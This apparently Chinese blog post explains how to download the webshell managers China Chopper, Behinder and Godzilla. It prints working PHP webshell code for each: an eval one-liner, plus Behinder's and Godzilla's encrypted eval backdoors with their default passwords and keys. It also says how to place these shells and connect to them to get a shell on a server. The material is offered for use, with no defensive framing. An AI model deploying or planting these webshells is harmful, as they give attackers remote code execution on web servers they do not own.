常用getshell工具的下载
中国菜刀
下载链接
https://github.com/raddyfiy/caidao-official-version
下载后校验MD5值
certutil -hashfile caidao.exe MD5
与文档进行比对
(chopper.exe)md5各版本校验码(仅exe主程序): 20111116 => 5001ef50c7e869253a7c152a638eab8a20141213 => 4b4a956b9c7dc734f339fa05e4c2a99020160620 - ac86066ffd58779f4c0db5030574b0cb20160622 - acaf6564637ba97f73297b0096c2994c #修复了mysql乱码20160622配置文件caidao.conf - > 4ed9e48fcfc0119a0f47ea89db6cd6ab更早:20111116 => 5001ef50c7e869253a7c152a638eab8a随GMT日期改变的动态密码,用法请注意看readme.txt20111022 => 7876d05ed4ee02967afc44a936186d2eCustomize模式的C#服务端增加了数据库管理功能...20110811 => 854bb49a84ce784ad70da7fd356d4f49ASP.NET的上传部分Bug修复, 另写了一个Customize模式的C#服务端20110806 => 4c8bc36c41151170f701f755ef700916修复一些BUG20110710 => d89c5957a1dc72bb229be070635e19b2解决确认对话框返回值不正确的BUG。20110707 => ec66b85fba3a8b7d1a41910ae5239b24解决浏览器新标签页打开BUG。20110703 => 3a8140e8e124326388cb13e6d9d0d4b5配置里添了几个选项:默认终端程序路径设置示例:<SHELL>/bin/sh</SHELL>虚拟终端默认命令设置示例:<CMD>whoami</CMD>文件管理默认打开的目录设置示例:<CD>c:\windows\temp\</CD>20110630 => 7e6c415ca57e6ecaa6c61147a2549477数据库导入,自写脚本编码后再提交,修复浏览器小BUG,其它。网站开通自写脚本分享栏目,脚本编码规范可以看下载的示例。20110628 => 60b49098d099ad01c3d80a5f794d4ebdPHP连接MySQL加了个<L></L>选项,用来设置数据库的字符集;自写脚本可在浏览器里执行了,示例请看 Script/phpspy2011.ccc;解决目录文件过多时显示慢的问题;因为缓存库读取有了变化,本次更新后最好清空一下缓存库。可以下载ip.dat放到菜刀的目录,用来显示网站的国别。使用时的有问题可以给我发邮件。20100928 => c05d44dbe353525f492208d891b53875界面调整,修正了一些BUG,加了个ColdFusion版的示例服务端(仅文件管理和虚拟终端,MX 7及以下版本修改文件时间功能不可用)20100812 => 4398e87939edb8573c44592942dca503重大更新,从这个版本起,菜刀开放接口,支持所有的动态脚本,服务端可按需自定义。写了个jsp的服务端(文件管理/虚拟终端/数据库管理),其它服务端可根据接口自个写!
确认无后门,安装完成
开始使用,这个工具类似于中国蚁剑,用于连接一句话木马getshell
左边写路径,右边写密码即可,文件内容为<?php @eval($_POST[1]);?>
冰蝎
下载链接
https://github.com/rebeyond/Behinder/releases
创建shell文件,内容为冰蝎自带的那个shell.php即可,如下所示
<?php
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>
哥斯拉
下载地址
https://github.com/BeichenDream/Godzilla/releases
shell内容如下
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}
$pass='verter';
$payloadName='payload';
$key='cb42e130d1471239';
if (isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if (stripos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}
}
连接
常用getshell工具的下载相关推荐
- CTF常用脚本工具(附下载地址)
该项目主要记录CTF中用到的工具 Base base64解码输出字节文本 base64隐写加密与解密 base64连续解码 Base64扩展 base64字符替换表 B64-B32-B16解密 b16 ...
- Linux系列讲解 —— 常用小工具下载
常用工具系列 相关文章: Windows平台 常用开发工具下载 putty,Android Studio,Visual Studio Code,git,Visual Paradigm社区版 Ubunt ...
- 常用开发工具 之 SQLite 数据库 与 Navicat for SQLite 的下载、安装与简单使用说明
常用开发工具 之 SQLite 数据库 与 Navicat for SQLite 的下载.安装与简单使用说明 目录 常用开发工具 之 SQLite 数据库 与 Navicat for SQLite 的 ...
- Windows平台 常用开发工具下载
常用工具系列 相关文章: Windows平台 常用开发工具下载 putty,Android Studio,Visual Studio Code,git,Visual Paradigm社区版 Ubunt ...
- 我的常用在线工具网站
小伙伴们大家好,本期再托一次家底,和大家分享十几个自己日常工作学习过程中的常用在线工具和网站,希望能有帮助. 也欢迎小伙伴们分享和安利出你们觉得有用的工具,不要停啊. 本文 Github 开源项目:g ...
- 华为网络技术培训笔记之常用网络工具(二)
TFTP使用 TFTP Server是路由器文件管理系统常用的工具软件,用于VRP路由器软件.配置文件的上.下载. TFTP在路由器升级中的实际应用. 1. 先启动FTFP服务 2. 将需要加载的 ...
- Java新手看招 常用开发工具介绍
Java新手看招 常用开发工具介绍 Java的应用越来越广泛,学习Java的人也越来越多.学过程序设计的人知道,使用Basic进行程序设计,可以使用QBasic.Visual Basic等开发工具:使 ...
- 工作中常用,实用工具推荐!
原文:工作中常用,实用工具推荐! Red Gate 家族 大名鼎鼎的RedGate,相信大家都不会陌生,Reflector就是它家做的.这里就不介绍了.我本地安装的是09年下的一个套装,我介绍下常用的 ...
- 第二章 java常用开发工具以及程序的编写
2019独角兽企业重金招聘Python工程师标准>>> 第二章 java常用开发工具以及程序的编写 1. 程序的概念 2. java程序的开发的三个步骤 ...
最新文章
- 《数据竞赛入门讲义》下载,北航计算机硕士两年经验总结
- 2851 菜菜买气球
- ExoPlayer 开发者指导
- App Store审核被拒的23个理由
- 【POJ2387】Til the Cows Come Home (最短路)
- vue页面跳转后返回原页面初始位置
- ubuntu安装pytorch镜像修改及下载
- 带有Prometheus的弹簧靴和Micrometer第5部分:旋转Prometheus
- 生成随机测试数据的文件的程序
- Webpack搭建React开发环境
- 如何成为一名架构师,架构师成长之路(转)
- Codeforces Round #313 (Div. 1) C. Gerald and Giant Chess DP
- 面向机器学习的特征工程 八、自动化特征提取器:图像特征提取和深度学习
- IT民工系列——c#控制Word的类库。对com操作进行了封装
- cvSaveImage用法
- Latex表格中内容过长换行方法
- 十、RD 虚拟主机配置(三)
- spring接收ajax参数的几种方式
- linux实验十shell程序设计,实验二Linux Shell编程.doc
- vs2015c 语言包,有关Visual Studio 2015 中文语言包 无法下载
热门文章
- 基于JSP的二手车拍卖网-java二手车拍卖系统
- 解决OSError: [Errno 98] Address already in use问题
- jgrid 多选 快捷键_Intellij IDEA史上最全快捷键大全
- css 鼠标沙漏,CSS3 沙漏动画
- 基于Volcano 3D游戏引擎开发一个类似魔兽世界的场景
- 2023届秋招进入最卷阶段!
- Simulink软件开发问题记录表
- 前端歌谣的刷题之路-第一百三十题-absolute
- 投票作弊程序制作思路(续)——突破IP限制投票
- 【愚公系列】2021年12月 攻防世界-简单题-REVERSE-001(Hello, CTF)